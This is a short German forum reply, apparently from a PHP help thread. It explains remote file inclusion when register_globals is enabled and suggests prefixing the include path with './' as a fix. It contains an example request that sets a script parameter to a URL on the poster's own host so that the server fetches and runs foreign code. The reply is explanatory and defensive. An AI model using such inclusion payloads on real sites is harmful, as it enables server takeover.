Moin,
ich gehe mal davon aus, dass register_globals aktiv ist? Dann mach ich z.B. sowas:
Code:
GET deinskript.php?Sec=http://meineseite.de/boesesscript.php?
Ergebnis:
Code:
include('http://meineseite.de/boesesscript.php?home.php');
Mach z.B. immer sowas:
Code:
include './'. $Sec .'home.php';
Weiters solltest du bei den Leuten anfragen, was genau das Problem zu sein scheint, und wie sie von der Luecke wissen (wollen).
@Klaus-B: das mit can_inc hilft in diesem Fall gar nicht. Remote code inclusion bedeutet dass Code von einem fremden Server eingebunden wird, und nicht dass deine Dateien von einem nicht-autorisierten File aufgerufen werden
Greetz
alcaeus